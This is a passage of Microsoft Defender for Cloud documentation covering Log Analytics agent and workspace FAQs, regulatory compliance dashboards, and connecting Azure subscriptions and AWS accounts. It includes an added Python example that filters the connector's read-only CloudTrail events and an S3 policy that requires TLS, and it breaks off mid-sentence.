  ◦ You can opt out of automatic provisioning. After migration, set the default
  workspace settings as described in How can I use my existing Log Analytics
  workspace?


  ◦ Or, you can allow the migration to complete, the Log Analytics agent to be
  installed on the VMs, and the VMs connected to the created workspace. Then,
  select your own custom workspace by setting the default workspace setting
  with opting in to reconfiguring the already installed agents. For more
  information, see How can I use my existing Log Analytics workspace?


What are the implications of opting out of
automatic provisioning?


When migration is complete, Defender for Cloud can't collect security data from the VM
and some security recommendations and alerts are unavailable. If you opt out, install
the Log Analytics agent manually. See recommended steps when opting out.


What are the recommended steps when opting 
out of automatic provisioning? 


Manually install the Log Analytics agent extension so Defender for Cloud can collect
security data from your VMs and provide recommendations and alerts. See agent
installation for Windows VM or agent installation for Linux VM for guidance on
installation.


You can connect the agent to any existing custom workspace or Defender for Cloud 
created workspace. If a custom workspace doesn't have the "Security" or 
"SecurityCenterFree" solutions enabled, you need to apply a solution. To apply, select 
the custom workspace and apply a pricing tier via the Environment settings > Defender 
plans page. 


Defender for Cloud enables the correct solution on the workspace based on the selected
options.


How do I remove OMS extensions installed by 
Defender for Cloud? 


You can manually remove the Log Analytics agent but it isn't recommended. Removing 
OMS extensions limits Defender for Cloud's recommendations and alerts. 


Note


If data collection is enabled, Defender for Cloud will reinstall the agent after you
remove it. You must disable data collection before manually removing the agent.
See How do I stop the automatic agent installation and workspace creation? for
instructions on disabling data collection.

To manually remove the agent: 
1. In the portal, open Log Analytics. 


2. On the Log Analytics page, select a workspace.


3. Select the VMs that you don't want to monitor and select Disconnect. 
Note


If a Linux VM already has a nonextension OMS agent, removing the extension
removes the agent as well and you have to reinstall it.


Will Defender for Cloud work using an OMS 
gateway? 


Yes. Microsoft Defender for Cloud uses Azure Monitor to collect data from Azure VMs 
and servers, using the Log Analytics agent. To collect the data, each VM and server must 
connect to the Internet using HTTPS. The connection can be direct, using a proxy, or 
through the OMS Gateway. 


Does the Log Analytics agent affect the 
performance of my servers? 


The agent consumes a nominal amount of system resources and should have little effect 
on the performance. For more information on performance effect and the agent and 
extension, see the planning and operations guide. 


Agentless 


Which data is collected from snapshots? 


Agentless scanning collects data similar to the data an agent collects to perform the
same analysis. Raw data, PIIs or sensitive business data isn't collected, and only
metadata results are sent to Defender for Cloud.


What are the costs related to agentless 
scanning? 


Agentless scanning is included in Defender Cloud Security Posture Management (CSPM) 
and Defender for Servers P2 plans. No other costs incur to Defender for Cloud when 
enabling it. 


Note


AWS charges for retention of disk snapshots. The Defender for Cloud scanning 
process actively tries to minimize the period during which a snapshot is stored in 
your account (typically up to a few minutes). AWS may charge an overhead cost for 
the disk snapshots storage. Check with AWS to see what costs apply to you. 


Workspaces 


Am I billed for Azure Monitor logs on the
workspaces created by Defender for Cloud? 


There's a 500-MB free data ingestion for each workspace. It's calculated per node, per
reported workspace, per day, and available for every workspace that has a "Security" or
"AntiMalware" solution installed. You're charged for any data ingested over the 500-MB
limit.


Workspaces created by Defender for Cloud, while configured for Azure Monitor logs per 
node billing, don't incur Azure Monitor logs charges. Defender for Cloud billing is 
always based on your Defender for Cloud security policy and the solutions installed on a 
workspace: 


• Enhanced security off: Defender for Cloud enables the "SecurityCenterFree"
solution on the default workspace. There are no charges when there are no
Defender plans enabled.


• All Microsoft Defender for Cloud plans enabled: Defender for Cloud enables the
"Security" solution on the default workspace.


For pricing details in your local currency or region, see the pricing page.


Note


The log analytics pricing tier of workspaces created by Defender for Cloud doesn't 
affect Defender for Cloud billing. 


Note


This article was recently updated to use the term Azure Monitor logs instead of Log 
Analytics. Log data is still stored in a Log Analytics workspace and is still collected 
and analyzed by the same Log Analytics service. We are updating the terminology 
to better reflect the role of logs in Azure Monitor. See Azure Monitor terminology 
changes for details. 


Where is the default Log Analytics workspace 
created? 


The location of the default workspace depends on your Azure region: 


• For VMs in the United States and Brazil, the workspace location is the United States
• For VMs in Canada, the workspace location is Canada
• For VMs in Europe, the workspace location is Europe
• For VMs in the UK, the workspace location is the UK
• For VMs in East Asia and Southeast Asia, the workspace location is Asia
• For VMs in Korea, the workspace location is Korea
• For VMs in India, the workspace location is India
• For VMs in Japan, the workspace location is Japan
• For VMs in China, the workspace location is China
• For VMs in Australia, the workspace location is Australia


Can I delete the default workspaces created by
Defender for Cloud? 


Deleting the default workspace isn't recommended. Defender for Cloud uses the 
default workspaces to store security data from your VMs. If you delete a workspace, 
Defender for Cloud is unable to collect this data and some security recommendations 
and alerts are unavailable. 


To recover, remove the Log Analytics agent on the VMs connected to the deleted 
workspace. Defender for Cloud reinstalls the agent and creates new default workspaces. 


How can I use my existing Log Analytics 
workspace? 


You can select an existing Log Analytics workspace to store data collected by Defender 
for Cloud. To use your existing Log Analytics workspace: 


• The workspace must be associated with your selected Azure subscription.
• At a minimum, you must have read permissions to access the workspace.


Note


To get security alerts from that agent, make sure that the Log Analytics agent and 
the machine on which the agent is running both report to a Log Analytics 
workspace in the same tenant. 

To select an existing Log Analytics workspace: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


4. For the Log Analytics agent, select Edit configuration. 




5. Select Custom workspace and select your existing workspace. 


[Screenshot: Auto-provisioning configuration pane for the Log Analytics agent, with Agent type (Log Analytics Agent (Default) or Azure Monitor Agent (Preview)), Workspace selection (Default workspace(s) or Custom workspace), and Security events storage. The pane notes that when selecting a custom workspace the relevant solutions must be enabled on it, that any other paid solutions enabled on that workspace will apply to connected Azure VMs and may incur charges, and that the workspace should be in your desired region for data privacy.]


Tip


The list only includes workspaces to which you have access and which are in 
your Azure subscription. 


6. Select Apply. 


7. Select Continue. 


8. Select Save and confirm that you want to reconfigure monitored VMs. 


Important


This choice is only relevant if you're changing the configuration from the
default workspace to a custom workspace. If you're changing the setting from
one custom workspace to another or from a custom workspace to the default
workspace, the change isn't applied to existing machines.


• Select No if you want the new workspace settings to apply on new VMs only.
The new workspace settings only apply to new agent installations, that is, newly
discovered VMs that don't have the Log Analytics agent installed.

• Select Yes if you want the new workspace settings to apply on all VMs. In
addition, every VM connected to a Defender for Cloud created workspace is
reconnected to the new target workspace.


Note


If you select Yes, don't delete any workspaces created by Defender for Cloud 
until all VMs have been reconnected to the new target workspace. This 
operation fails if a workspace is deleted too early. 


Does Defender for Cloud override any existing 
connections between VMs and workspaces? 


If a VM already has the Log Analytics agent installed as an Azure extension, Defender for 
Cloud doesn't override the existing workspace connection. Instead, Defender for Cloud 
uses the existing workspace. The VM is protected if the "Security" or 
"SecurityCenterFree" solution has been installed on the workspace to which it's 
reporting. 


A Defender for Cloud solution is installed on the workspace selected in the Data 
Collection screen if not present already, and the solution is applied only to the relevant 
VMs. When you add a solution, it's automatically deployed by default to all Windows 
and Linux agents connected to your Log Analytics workspace. Solution Targeting allows 
you to apply a scope to your solutions. 


Tip


If the Log Analytics agent is installed directly on the VM (not as an Azure 
extension), Defender for Cloud doesn't install the Log Analytics agent, and security 
monitoring is limited. 


Does Defender for Cloud install solutions on my 
existing Log Analytics workspaces? What are the 
billing implications? 

When Defender for Cloud identifies that a VM is already connected to a workspace you
created, Defender for Cloud enables solutions on this workspace according to your
pricing configuration. The solutions are applied only to the relevant resources, via
solution targeting, so the billing remains the same.


• No Defender plans are enabled: Defender for Cloud installs the
"SecurityCenterFree" solution on the workspace and you aren't billed for it.


• Enable all Microsoft Defender plans: Defender for Cloud installs the "Security"
solution on the workspace.
I already have workspaces in my environment,
can I use them to collect security data? 


If a VM already has the Log Analytics agent installed as an Azure extension, Defender for 
Cloud uses the existing connected workspace. A Defender for Cloud solution is installed 
on the workspace if not present already, and the solution is applied only to the relevant 
VMs via solution targeting. 


When Defender for Cloud installs the Log Analytics agent on VMs, it uses the default 
workspaces created by Defender for Cloud if it's not pointed to an existing workspace. 


I already have a security solution on my
workspaces. What are the billing implications?


The Security & Audit solution is used to enable Microsoft Defender for Servers. If the 
Security & Audit solution is already installed on a workspace, Defender for Cloud uses 
the existing solution. There's no change in billing. 


Next steps 


Learn about how Defender for Cloud collects data 


Common questions about
regulatory compliance


FAQ 


How do I know which benchmark or 
standard to use? 


Microsoft cloud security benchmark (MCSB) is the canonical set of security
recommendations and best practices defined by Microsoft, aligned with common
compliance control frameworks including CIS Control Framework, NIST SP 800-53
and PCI-DSS. MCSB is a comprehensive cloud agnostic set of security principles
designed to recommend the most up-to-date technical guidelines for Azure along with
other clouds such as AWS and GCP. We recommend MCSB to customers who want to
maximize their security posture and align their compliance status with industry
standards.


The CIS Benchmark is authored by an independent entity, the Center for Internet
Security (CIS), and contains recommendations on a subset of core Azure services. We
work with CIS to try to ensure that their recommendations are up to date with the latest
enhancements in Azure, but they're sometimes delayed and can become outdated.
Nonetheless, some customers like to use this objective, third-party assessment from CIS
as their initial and primary security baseline.


Since we've released the Microsoft cloud security benchmark, many customers have 
chosen to migrate to it as a replacement for CIS benchmarks. 


What standards are supported in the 
compliance dashboard? 


By default, the regulatory compliance dashboard shows you the Microsoft cloud security 
benchmark. The Microsoft cloud security benchmark is the Microsoft-authored 
guidelines for security, and compliance best practices based on common compliance 
frameworks. Learn more in the Microsoft cloud security benchmark introduction. 


To track your compliance with any other standard, you'll need to explicitly add them to 
your dashboard. 


You can add other standards such as Azure CIS 1.3.0, NIST SP 800-53, NIST SP 800-171, 
SWIFT CSP CSCF-v2020, UK Official and UK NHS, HIPAA, Canada Federal PBMM, ISO 
27001, SOC2-TSP, and PCI-DSS 3.2.1. 


AWS: When users onboard, every AWS account has the AWS Foundational Security Best 
Practices assigned. This is the AWS-specific guideline for security and compliance best 
practices based on common compliance frameworks. 


Users that have one Defender bundle enabled can enable other standards. 
Available AWS regulatory standards: 


• CIS 1.2.0
• PCI DSS 3.2.1
• AWS Foundational Security Best Practices


To add regulatory compliance standards on AWS accounts:
1. Navigate to Environment settings. 
2. Select the relevant account. 
3. Select Standards. 
4. Select Add and choose Standard. 
5. Choose a standard from the drop-down menu. 


6. Select Save. 


[Screenshot: Add Standard pane under Microsoft Defender for Cloud > Settings.]
More standards will be added to the dashboard and included in the information on
Customize the set of standards in your regulatory compliance dashboard. 


Why do some controls appear grayed 
out? 


For each compliance standard in the dashboard, there's a list of the standard's controls. 
For the applicable controls, you can view the details of passing and failing assessments. 


Some controls are grayed out. These controls don't have any Defender for Cloud 
assessments associated with them. Some may be procedure or process-related, and so 
can't be verified by Defender for Cloud. Some don't have any automated policies or 
assessments implemented yet, but will have in the future. And some controls may be the 
platform's responsibility as explained in Shared responsibility in the cloud. 


How can I remove a built-in standard,
like PCI-DSS, ISO 27001, or SOC2 TSP
from the dashboard?


To customize the regulatory compliance dashboard, and focus only on the standards
that are applicable to you, you can remove any of the displayed regulatory standards
that aren't relevant to your organization. To remove a standard, follow the instructions in
Remove a standard from your dashboard.


I made the suggested changes based on
the recommendation, but it isn't being 
reflected in the dashboard? 


After you take action to resolve recommendations, wait 12 hours to see the changes to 
your compliance data. Assessments are run approximately every 12 hours, so you'll see 
the effect on your compliance data only after the assessments run. 


What permissions do I need to access
the compliance dashboard? 


To access all compliance data in your tenant, you need to have at least a Reader level of 
permissions on the applicable scope of your tenant, or all relevant subscriptions. 


The minimum set of roles for accessing the dashboard and managing standards is 
Resource Policy Contributor and Security Admin. 


The regulatory compliance dashboard 
isn't loading for me 


To use the regulatory compliance dashboard, Defender for Cloud must be enabled at 
the subscription level. If the dashboard isn't loading correctly, try the following steps: 


1. Clear your browser's cache. 
2. Try a different browser. 
3. Try opening the dashboard from a different network location. 


How can I view a report of passing and
failing controls per standard in my
dashboard?


On the main dashboard, you can see a report of passing and failing controls for (1) the
"top 4" lowest compliance standards in the dashboard. To see all the passing/failing
controls status, select (2) Show all x (where x is the number of standards you're
tracking). A context plane displays the compliance status for every one of your tracked
standards.
How can I download a report with
compliance data in a format other than 
PDF? 


When you select Download report, select the standard and the format (PDF or CSV). 
The resulting report will reflect the current set of subscriptions you've selected in the 
portal's filter. 


• The PDF report shows a summary status for the standard you selected
• The CSV report provides detailed results per resource, as it relates to policies
associated with each control


Currently, there's no support for downloading a report for a custom policy; only for the 
supplied regulatory standards. 


How can I create exceptions for some of 
the policies in the regulatory 
compliance dashboard? 


For policies that are built into Defender for Cloud and included in the secure score, you
can create exemptions for one or more resources directly in the portal as explained in
Exempting resources and recommendations from your secure score.


For other policies, you can create an exemption directly in the policy itself, by following 
the instructions in Azure Policy exemption structure. 


What Microsoft Defender plans or 
licenses do I need to use the regulatory
compliance dashboard? 


If you've got any of the Microsoft Defender plans (except for Defender for Servers Plan 
1) enabled on any of your Azure resources, you can access Defender for Cloud's 
regulatory compliance dashboard and all of its data. 


Note


For Defender for Servers you'll get regulatory compliance only for plan 2. Plan 1 
doesn't include regulatory compliance. 


Connect your Azure subscriptions 
In this guide, you'll learn how to enable Microsoft Defender for Cloud on your Azure
subscription. 


Microsoft Defender for Cloud is a cloud-native application protection platform (CNAPP) 
with a set of security measures and practices designed to protect your cloud-based 
applications end-to-end by combining the following capabilities: 


• A development security operations (DevSecOps) solution that unifies security
management at the code level across multicloud and multiple-pipeline
environments

• A cloud security posture management (CSPM) solution that surfaces actions that
you can take to prevent breaches

• A cloud workload protection platform (CWPP) with specific protections for servers,
containers, storage, databases, and other workloads


Defender for Cloud includes Foundational CSPM capabilities for free, complemented by 
additional paid plans required to secure all aspects of your cloud resources. To learn 
more about these plans and their costs, see the Defender for Cloud pricing page.


Defender for Cloud helps you find and fix security vulnerabilities. Defender for Cloud 
also applies access and application controls to block malicious activity, detect threats 
using analytics and intelligence, and respond quickly when under attack. 


Prerequisites 


• To view information related to a resource in Defender for Cloud, you must be
assigned the Owner, Contributor, or Reader role for the subscription or for the
resource group that the resource is located in.


Enable Defender for Cloud on your Azure 
subscription 


Tip


To enable Defender for Cloud on all subscriptions within a management group, see 
Enable Defender for Cloud on multiple Azure subscriptions. 


1. Sign in to the Azure portal.


2. Search for and select Microsoft Defender for Cloud. 


[Screenshot: Azure portal search results for "Microsoft Defender for Cloud", with the service listed under Services.]

The Defender for Cloud's overview page opens. 
[Screenshot: Defender for Cloud overview page, with upgrade prompts for Defender Cloud Security Posture Management (CSPM) and Defender EASM.]


Defender for Cloud is now enabled on your subscription and you have access to the
basic features provided by Defender for Cloud. These features include:


• The Foundational Cloud Security Posture Management (CSPM) plan.

• Recommendations.

• Access to the Asset inventory.

• Workbooks.

• Secure score.

• Regulatory compliance with the Microsoft cloud security benchmark.


The Defender for Cloud overview page provides a unified view into the security posture 
of your hybrid cloud workloads, helping you discover and assess the security of your 
workloads and to identify and mitigate risks. Learn more in Microsoft Defender for 
Cloud's overview page. 


You can view and filter your list of subscriptions from the subscriptions menu. Defender
for Cloud then adjusts the overview page to reflect the security posture of the selected
subscriptions.


Within minutes of launching Defender for Cloud for the first time, you might see:

• Recommendations for ways to improve the security of your connected resources.
• An inventory of your resources that Defender for Cloud assesses, along with the
  security posture of each.


Enable all paid plans on your subscription 


To enable all of Defender for Cloud's protections, you need to enable the plans for the
workloads that you want to protect.

Note

• You can enable Microsoft Defender for Storage accounts at either the subscription
  level or resource level.
• You can enable Microsoft Defender for SQL at either the subscription level or
  resource level.
• You can enable Microsoft Defender for open-source relational databases at the
  resource level only.
• The Microsoft Defender plans available at the workspace level are Microsoft
  Defender for Servers and Microsoft Defender for SQL servers on machines.

When you enable Defender plans on an entire Azure subscription, the protections are
applied to all resources of the covered types in that subscription.


To enable additional paid plans on a subscription:

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. In the Defender for Cloud menu, select Environment settings.
4. Select the subscription or workspace that you want to protect.
5. Select Enable all to enable all of the plans for Defender for Cloud.
6. Select Save.

When you select Save, Defender for Cloud's enhanced security features are enabled on
all the resource types you selected. The first 30 days are free. For more information on
Defender for Cloud pricing, visit the pricing page.


All of the plans are turned on and the monitoring components required by each plan 
are deployed to the protected resources. 


If you want to disable any of the plans, toggle the individual plan to off. The extensions 
used by the plan aren't uninstalled but, after a short time, the extensions stop collecting 
data. 


Tip


To enable Defender for Cloud on all subscriptions within a management group, see 
Enable Defender for Cloud on multiple Azure subscriptions. 


Next steps 


In this guide, you enabled Defender for Cloud on your Azure subscription. The next step
is to set up your hybrid and multicloud environments:

• Quickstart: Connect your non-Azure machines to Microsoft Defender for Cloud
  with Azure Arc
• Quickstart: Connect your AWS accounts to Microsoft Defender for Cloud
• Quickstart: Connect your GCP projects to Microsoft Defender for Cloud
• Quickstart: Connect your non-Azure machines to Microsoft Defender for Cloud
  with Defender for Endpoint


Connect your AWS account to Microsoft Defender for Cloud

Workloads commonly span multiple cloud platforms. Cloud security services must do
the same. Microsoft Defender for Cloud helps protect workloads in Amazon Web
Services (AWS), but you need to set up the connection between them and Defender for
Cloud.


If you're connecting an AWS account that you previously connected by using the classic 
connector, you must remove it first. Using an AWS account that's connected by both the 
classic and native connectors can produce duplicate recommendations. 


In the Defender for Cloud overview dashboard, connected AWS accounts are displayed
alongside your Azure subscriptions (screenshot omitted).

You can learn more by watching the New AWS connector in Defender for Cloud video
from the Defender for Cloud in the Field video series.

For a reference list of all the recommendations that Defender for Cloud can provide for
AWS resources, see Security recommendations for AWS resources - a reference guide.


Prerequisites 


To complete the procedures in this article, you need:

• A Microsoft Azure subscription. If you don't have an Azure subscription, you can
  sign up for a free one.
• Microsoft Defender for Cloud set up on your Azure subscription.
• Access to an AWS account.
• Contributor permission for the relevant Azure subscription, and Administrator
  permission on the AWS account.


Note


The AWS connector is not available on the national government clouds (Azure 
Government, Microsoft Azure operated by 21Vianet). 


Defender for Containers

If you choose the Microsoft Defender for Containers plan, you need:

• At least one Amazon EKS cluster with permission to access the EKS Kubernetes
  API server. If you need to create a new EKS cluster, follow the instructions in
  Getting started with Amazon EKS - eksctl.
• The resource capacity to create a new Amazon SQS queue, Kinesis Data Firehose
  delivery stream, and Amazon S3 bucket in the cluster's region.


Defender for SQL

If you choose the Microsoft Defender for SQL plan, you need:

• Microsoft Defender for SQL enabled on your subscription. Learn how to protect
  your databases.
• An active AWS account, with EC2 instances running SQL Server or RDS Custom for
  SQL Server.
• Azure Arc for servers installed on your EC2 instances or RDS Custom for SQL
  Server.


We recommend that you use the auto-provisioning process to install Azure Arc on all of 
your existing and future EC2 instances. To enable the Azure Arc auto-provisioning, you 
need Owner permission on the relevant Azure subscription. 


AWS Systems Manager (SSM) manages auto-provisioning by using the SSM Agent.
Some Amazon Machine Images already have the SSM Agent preinstalled. If your EC2
instances don't have the SSM Agent, install it by using these instructions from Amazon:
Install SSM Agent for a hybrid and multicloud environment (Windows).

Ensure that the IAM instance profile attached to your EC2 instances includes the
managed policy AmazonSSMManagedInstanceCore. It grants the SSM Agent the
permissions needed for the core functionality of the AWS Systems Manager service.

Enable these other extensions on the Azure Arc-connected machines:

• Microsoft Defender for Endpoint
• A vulnerability assessment solution (TVM or Qualys)
• The Log Analytics agent on Azure Arc-connected machines or the Azure Monitor
  agent


Make sure the selected Log Analytics workspace has a security solution installed. The 
Log Analytics agent and the Azure Monitor agent are currently configured at the 
subscription level. All of your AWS accounts and Google Cloud Platform (GCP) projects 
under the same subscription inherit the subscription settings for the Log Analytics agent 
and the Azure Monitor agent. 


Learn more about monitoring components for Defender for Cloud. 


Defender for Servers

If you choose the Microsoft Defender for Servers plan, you need:

• Microsoft Defender for Servers enabled on your subscription. Learn how to enable
  plans in Enable enhanced security features.
• An active AWS account, with EC2 instances.
• Azure Arc for servers installed on your EC2 instances.


We recommend that you use the auto-provisioning process to install Azure Arc on all of 
your existing and future EC2 instances. To enable the Azure Arc auto-provisioning, you 
need Owner permission on the relevant Azure subscription. 


AWS Systems Manager manages auto-provisioning by using the SSM Agent. Some
Amazon Machine Images already have the SSM Agent preinstalled. If your EC2
instances don't have the SSM Agent, install it by using either of the following
instructions from Amazon:

• Install SSM Agent for a hybrid and multicloud environment (Windows)
• Install SSM Agent for a hybrid and multicloud environment (Linux)

Ensure that the IAM instance profile attached to your EC2 instances includes the
managed policy AmazonSSMManagedInstanceCore, which grants the SSM Agent the
permissions needed for the core functionality of the AWS Systems Manager service.

If you want to manually install Azure Arc on your existing and future EC2 instances, use
the "EC2 instances should be connected to Azure Arc" recommendation to identify
instances that don't have Azure Arc installed.

Enable these other extensions on the Azure Arc-connected machines:

• Microsoft Defender for Endpoint
• A vulnerability assessment solution (TVM or Qualys)
• The Log Analytics agent on Azure Arc-connected machines or the Azure Monitor
  agent


Make sure the selected Log Analytics workspace has a security solution installed. The 
Log Analytics agent and the Azure Monitor agent are currently configured at the 
subscription level. All of your AWS accounts and GCP projects under the same 
subscription inherit the subscription settings for the Log Analytics agent and the Azure 
Monitor agent. 


Learn more about monitoring components for Defender for Cloud. 


Defender for Servers assigns tags to your AWS resources to manage the auto-provisioning
process. You must have these tags properly assigned to your resources so that Defender
for Cloud can manage them: AccountId, Cloud, InstanceId, and MDFCSecurityConnector.


Defender CSPM 


If you choose the Microsoft Defender CSPM plan, you need:

• A Microsoft Azure subscription. If you don't have an Azure subscription, you can
  sign up for a free subscription.
• Microsoft Defender for Cloud enabled on your Azure subscription.
• Your non-Azure machines and AWS accounts connected.
• To gain access to all of the features available from the CSPM plan, the plan
  must be enabled by the Subscription Owner.


Learn more about how to enable Defender CSPM. 


Connect your AWS account 


To connect your AWS account to Defender for Cloud by using a native connector:

1. Sign in to the Azure portal.

2. Go to Defender for Cloud > Environment settings.

3. Select Add environment > Amazon Web Services.

[Screenshot: the Environment settings page, with the Add environment menu open and Amazon Web Services selected.]

4. Enter the details of the AWS account, including the location where you store the
connector resource.

[Screenshot: the Account details tab of the Add AWS account wizard. Fields: Connector name; Onboard (Management account or Single account); Subscription; AWS Regions; Resource group; Location; AWS account Id; Excluded accounts (comma-separated).]

Optionally, select Management account to create a connector to a management
account. Connectors are created for each member account discovered under the
provided management account. Auto-provisioning is enabled for all of the newly
onboarded accounts.


Select Defender plans 


In this section of the wizard, you select the Defender for Cloud plans that you want to 
enable. 


1. Select Next: Select plans.

The Select plans tab is where you choose which Defender for Cloud capabilities to
enable for this AWS account. Each plan has its own requirements for permissions
and might incur charges.


Important

To present the current status of your recommendations, the Microsoft
Defender Cloud Security Posture Management plan queries the AWS resource
APIs several times a day. These read-only API calls incur no charges, but they
are recorded in CloudTrail if you've enabled a trail for read events.

As explained in the AWS documentation, there are no additional charges
for keeping one trail. If you're exporting the data out of AWS (for example, to
an external SIEM system), this increased volume of calls might also increase
ingestion costs. In such cases, we recommend filtering out the read-only calls
made through the Defender for Cloud role, arn:aws:iam::[accountId]:role/CspmMonitorAws.
(This is the default role name. Confirm the role name configured on your account.)


2. By default, the Servers plan is set to On. This setting is necessary to extend the 
coverage of Defender for Servers to AWS EC2. Ensure that you've fulfilled the 
network requirements for Azure Arc. 


Optionally, select Configure to edit the configuration as required. 


Note


The respective Azure Arc servers for EC2 instances or GCP virtual machines 
that no longer exist (and the respective Azure Arc servers with a status of 
Disconnected or Expired) are removed after 7 days. This process removes 
irrelevant Azure Arc entities to ensure that only Azure Arc servers related to 
existing instances are displayed. 


3. By default, the Containers plan is set to On. This setting is necessary to have 
Defender for Containers protect your AWS EKS clusters. Ensure that you've fulfilled 
the network requirements for the Defender for Containers plan. 


Note


Azure Arc-enabled Kubernetes, the Azure Arc extensions for Defender agent, 
and Azure Policy for Kubernetes should be installed. Use the dedicated 
Defender for Cloud recommendations to deploy the extensions (and Azure 
Arc, if necessary), as explained in Protect Amazon Elastic Kubernetes Service 
clusters. 


Optionally, select Configure to edit the configuration as required. If you choose to 
turn off this configuration, the Threat detection (control plane) feature is also 
disabled. Learn more about feature availability. 


4. By default, the Databases plan is set to On. This setting is necessary to extend 
coverage of Defender for SQL to AWS EC2 and RDS Custom for SQL Server. 


Optionally, select Configure to edit the configuration as required. We recommend 
that you leave it set to the default configuration. 


5. Select Next: Configure access. 


6. On the Configure access tab, select Click to download the CloudFormation
template to download the CloudFormation template.

[Screenshot: the Configure access tab, with the download link for the CloudFormation template, the "Create Stack in AWS" instructions (deploy the template as a Stack on the account you're onboarding and, for a management account, also as a StackSet), a Go to AWS button, and the StackSet name and Role ARN fields.]

7. Continue to configure access by making the following selections:

   a. Choose a deployment type:

      • Default access: Allows Defender for Cloud to scan your resources and
        automatically include future capabilities.
      • Least privilege access: Grants Defender for Cloud access only to the current
        permissions needed for the selected plans. If you select the least privileged
        permissions, you'll receive notifications on any new roles and permissions
        that are required to get full functionality for connector health.

   b. Choose a deployment method: AWS CloudFormation or Terraform.


[Screenshot: the Configure access tab showing Permissions type (Default access or Least privilege access), the AWS CloudFormation and Terraform deployment tabs, the generated template with a Copy button and a link to customize the role names, and the "Create Stack in AWS" steps: open CloudFormation Stacks, choose Upload a template file, upload the downloaded template, enter a stack name, keep the default stack options, acknowledge that CloudFormation might create IAM resources with custom names, and select Submit.]


8. Follow the on-screen instructions for the selected deployment method to 
complete the required dependencies on AWS. If you're onboarding a management 
account, you need to run the CloudFormation template both as Stack and as 
StackSet. Connectors are created for the member accounts up to 24 hours after the 
onboarding. 


9. Select Next: Review and generate. 


10. Select Create. 


Defender for Cloud immediately starts scanning your AWS resources. Security 
recommendations appear within a few hours. 
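The Important note under Select Defender plans recommends filtering the Defender for Cloud role's read-only calls out of CloudTrail data before it reaches an external SIEM. The following Python script is an added example, not part of the Microsoft documentation or of the connector itself. It assumes the default role name CspmMonitorAws, a placeholder account ID 123456789012, and a constructed set of CloudTrail records in the log-file delivery format. It drops only events that are both read-only and made through that role, so a write made with the connector role (which would be unexpected and worth investigating) is still forwarded.

```python
"""Filter Defender for Cloud's read-only CloudTrail events before SIEM export.

Added example, not from the Microsoft documentation. Assumptions: the default
connector role name CspmMonitorAws and the placeholder account ID 123456789012.
"""
import json

ACCOUNT_ID = "123456789012"  # placeholder; substitute your AWS account ID
# Default role created by the Defender for Cloud connector; confirm the name on your account.
CSPM_ROLE_ARN = f"arn:aws:iam::{ACCOUNT_ID}:role/CspmMonitorAws"
# Calls made with an assumed role are attributed to an STS ARN of the form
# arn:aws:sts::<account>:assumed-role/<RoleName>/<SessionName>.
CSPM_SESSION_PREFIX = f"arn:aws:sts::{ACCOUNT_ID}:assumed-role/CspmMonitorAws/"


def is_cspm_read_only(record):
    """True when the record is a read-only call made through the connector role."""
    identity = record.get("userIdentity", {})
    issuer_arn = (identity.get("sessionContext", {})
                  .get("sessionIssuer", {})
                  .get("arn", ""))
    caller_arn = identity.get("arn", "")
    from_cspm_role = (issuer_arn == CSPM_ROLE_ARN
                      or caller_arn.startswith(CSPM_SESSION_PREFIX))
    # CloudTrail marks each record with a boolean "readOnly" field. A missing or
    # false flag is treated as a write so that anything unexpected is forwarded.
    return from_cspm_role and record.get("readOnly") is True


def load_records(trail_text):
    """Parse one CloudTrail log file ({"Records": [...]}) into a list of records."""
    return json.loads(trail_text).get("Records", [])


def filter_for_export(records):
    """Return the records to forward: everything except the connector's read-only noise."""
    return [r for r in records if not is_cspm_read_only(r)]


def _cspm_identity(session_name):
    """userIdentity block for a session of the connector role (constructed)."""
    return {
        "type": "AssumedRole",
        "arn": CSPM_SESSION_PREFIX + session_name,
        "sessionContext": {"sessionIssuer": {"arn": CSPM_ROLE_ARN}},
    }


# Constructed sample log file in the CloudTrail delivery format (not real events).
SAMPLE_TRAIL = json.dumps({"Records": [
    {  # posture scan by the connector role: read-only -> drop
        "eventName": "DescribeInstances", "eventSource": "ec2.amazonaws.com",
        "readOnly": True, "userIdentity": _cspm_identity("MDCScan")},
    {  # a write with the connector role would be unexpected -> keep and investigate
        "eventName": "AuthorizeSecurityGroupIngress", "eventSource": "ec2.amazonaws.com",
        "readOnly": False, "userIdentity": _cspm_identity("MDCScan")},
    {  # read-only call by a human IAM user: not the connector role -> keep
        "eventName": "ListBuckets", "eventSource": "s3.amazonaws.com",
        "readOnly": True,
        "userIdentity": {"type": "IAMUser",
                         "arn": f"arn:aws:iam::{ACCOUNT_ID}:user/alice"}},
]})


if __name__ == "__main__":
    for r in filter_for_export(load_records(SAMPLE_TRAIL)):
        print(r["eventName"], r["userIdentity"]["arn"])
```

Apply the filter to each delivered log file before forwarding; most SIEMs can express the same predicate as an ingest-time drop rule on the sessionIssuer ARN and the readOnly flag. If you customized the role name during onboarding, change CSPM_ROLE_ARN and CSPM_SESSION_PREFIX to match.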


Deploy a CloudFormation template to your AWS account


As part of connecting an AWS account to Microsoft Defender for Cloud, you deploy a 
CloudFormation template to the AWS account. This template creates all of the required 
resources for the connection. 


Deploy the CloudFormation template by using Stack (or StackSet if you have a 
management account). When you're deploying the template, the Stack creation wizard 
offers the following options. 


Specify template

A template is a JSON or YAML file that describes your stack's resources and properties.
The Template source setting offers two choices:

• Amazon S3 URL: Upload the downloaded CloudFormation template to your own
  S3 bucket with your own security configurations. Enter the URL to the S3 bucket in
  the AWS deployment wizard.
• Upload a template file: AWS automatically creates an S3 bucket that the
  CloudFormation template is saved to. The automation for the S3 bucket has a
  security misconfiguration that causes the "S3 buckets should require requests to
  use Secure Socket Layer" recommendation to appear. You can remediate this
  recommendation by applying the following bucket policy (replace <S3 Bucket ARN>
  with the ARN of the bucket that CloudFormation created):

JSON

{
    "Id": "ExamplePolicy",
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowSSLRequestsOnly",
            "Action": "s3:*",
            "Effect": "Deny",
            "Resource": [
                "<S3 Bucket ARN>",
                "<S3 Bucket ARN>/*"
            ],
            "Condition": {
                "Bool": {
                    "aws:SecureTransport": "false"
                }
            },
            "Principal": "*"
        }
    ]
}

Note

When running the CloudFormation StackSets while onboarding an AWS
management account, you may encounter the following error message: "You
must enable organizations access to operate a service managed stack set".
This error indicates that you haven't enabled trusted access for AWS
Organizations.

To remediate this error, the CloudFormation StackSets page has a prompt with a
button that you can select to enable trusted access. After trusted access is
